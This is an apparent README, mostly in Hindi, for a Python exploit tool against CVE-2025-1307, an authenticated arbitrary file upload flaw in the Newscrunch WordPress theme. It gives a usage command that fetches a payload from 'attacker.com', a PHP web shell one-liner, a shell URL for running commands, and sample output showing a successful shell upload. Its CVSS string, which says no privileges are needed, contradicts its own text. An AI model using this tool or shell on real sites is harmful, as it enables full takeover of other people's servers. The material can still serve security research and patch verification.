
Newscrunch <= 1.8.4 - प्रमाणित (Subscriber+) मनमाना फ़ाइल अपलोड
यह एक्सप्लॉइट Newscrunch WordPress थीम में एक गंभीर भेद्यता (CVE-2025-1307) को लक्षित करता है। यह दोष newscrunch_install_and_activate_plugin() फ़ंक्शन में क्षमता जांच की कमी के कारण प्रमाणित उपयोगकर्ताओं (सब्सक्राइबर और उससे ऊपर) को मनमानी फ़ाइलें अपलोड करने की अनुमति देता है। इससे रिमोट कोड निष्पादन (RCE) हो सकता है, जो प्रभावित WordPress साइट को पूरी तरह से समझौता कर देता है।
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hशोषण क्षमता: इसके लिए सब्सक्राइबर विशेषाधिकार या उससे ऊपर वाले वैध WordPress खाते की आवश्यकता है।
✅ CVE-2025-1307 का स्वचालित शोषण
✅ असुरक्षित थीम संस्करण का स्वतः पता लगाना
✅ ZIP पेलोड का स्वचालित निष्कर्षण और निष्पादन
✅ ZIP से गतिशील रूप से शेल फ़ाइल नाम प्राप्त करता है
✅ शोषण के बाद शेल उपलब्धता की स्वतः जाँच करता है
✅ डीबगिंग के लिए साफ और संरचित लॉगिंग
सुनिश्चित करें कि आपके पास Python 3.x स्थापित है और आवश्यक निर्भरताएँ स्थापित करें:
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
Malicious file URL to upload
एक बार शेल सफलतापूर्वक अपलोड हो जाने पर, यह लक्ष्य प्रणाली पर रिमोट कमांड निष्पादन की अनुमति देता है। शेल फ़ाइल को ZIP आर्काइव के अंदर रखा जाना चाहिए, और यह शोषण पर स्वचालित रूप से निकाला जाएगा।
सुनिश्चित करें कि आपका PHP शेल (shell.php) ZIP आर्काइव के अंदर है। फिर, एक्सप्लॉइट का उपयोग करके ZIP फ़ाइल अपलोड करें।
<?php system($_GET['cmd']); ?>
आप शेल URL में cmd पैरामीटर जोड़कर ब्राउज़र के माध्यम से सिस्टम कमांड निष्पादित कर सकते हैं:
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। भेद्यताओं का अनधिकृत शोषण अवैध है और कानून द्वारा दंडनीय है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। जिम्मेदारी से उपयोग करें।
द्वारा: Nxploit | Khaled Alenazi